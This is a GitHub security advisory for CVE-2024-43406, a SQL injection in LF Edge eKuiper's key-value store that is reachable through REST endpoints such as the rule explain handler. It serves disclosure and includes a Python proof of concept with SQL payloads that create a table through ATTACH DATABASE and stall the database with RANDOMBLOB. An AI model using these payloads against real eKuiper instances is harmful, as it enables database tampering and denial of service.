ghsa-r5ph-4jxm-6j9p
Vulnerability from github
Published
2024-08-20 20:04
Modified
2024-08-27 14:27
Severity
8.8 (High) - CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.7 (High) - CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
LF Edge eKuiper has a SQL Injection in sqlKvStore
Details

Summary

A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.

Details

I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.

The SQL injection can happen in the code: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93 The code to accept user input is: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277

The rule id in the above code can be used to exploit SQL query.

Note that the delete function is also vulnerable: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141

PoC

``` import requests from urllib.parse import quote

SELECT val FROM 'xxx' WHERE key='%s';

payload = f"""'; ATTACH DATABASE 'test93' AS test93; CREATE TABLE test93.pwn (dataz text); INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--"""

payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--"

url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain" # explainRuleHandler

res = requests.get(url) print(res.content) ```

The screenshot shows the malicious SQL query to insert a value: image

The screenshot shows the breakpoint of executing the query: image

Impact

SQL Injection vulnerability

The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lf-edge/ekuiper"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.14.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "ekuiper"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.14.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-43406"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-20T20:04:31Z",
    "nvd_published_at": "2024-08-20T15:15:24Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. \n\n### Details\nI will use explainRuleHandler (\"/rules/{name}/explain\") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.\n\nThe SQL injection can happen in the code:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93\nThe code to accept user input is:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277\n\nThe rule id in the above code can be used to exploit SQL query.\n\nNote that the delete function is also vulnerable:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141\n\n### PoC\n```\nimport requests\nfrom urllib.parse import quote\n\n# SELECT val FROM \u0027xxx\u0027 WHERE key=\u0027%s\u0027;\npayload = f\"\"\"\u0027; ATTACH DATABASE \u0027test93\u0027 AS test93;\nCREATE TABLE test93.pwn (dataz text);\nINSERT INTO test93.pwn (dataz) VALUES (\"sql injection\");--\"\"\"\n\n#payload = \"deadbeef\u0027; SELECT 123=LIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(100000000))));--\"\n\nurl = f\"http://127.0.0.1:9081/rules/{quote(payload,safe=\u0027\u0027)}/explain\"   # explainRuleHandler\n\nres = requests.get(url)\nprint(res.content)\n```\n\nThe screenshot shows the malicious SQL query to insert a value:\n![image](https://github.com/user-attachments/assets/baf035cc-a561-4909-8d1f-e455e75375cb)\n\nThe screenshot shows the breakpoint of executing the query:\n![image](https://github.com/user-attachments/assets/b9c29945-a0cc-4271-bdc8-c1bddfda5b6f)\n\n\n\n\n### Impact\nSQL Injection vulnerability\n\nThe reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.\n",
  "id": "GHSA-r5ph-4jxm-6j9p",
  "modified": "2024-08-27T14:27:18Z",
  "published": "2024-08-20T20:04:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43406"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lf-edge/ekuiper"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/ekuiper/PYSEC-2024-72.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "LF Edge eKuiper has a SQL Injection in sqlKvStore"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.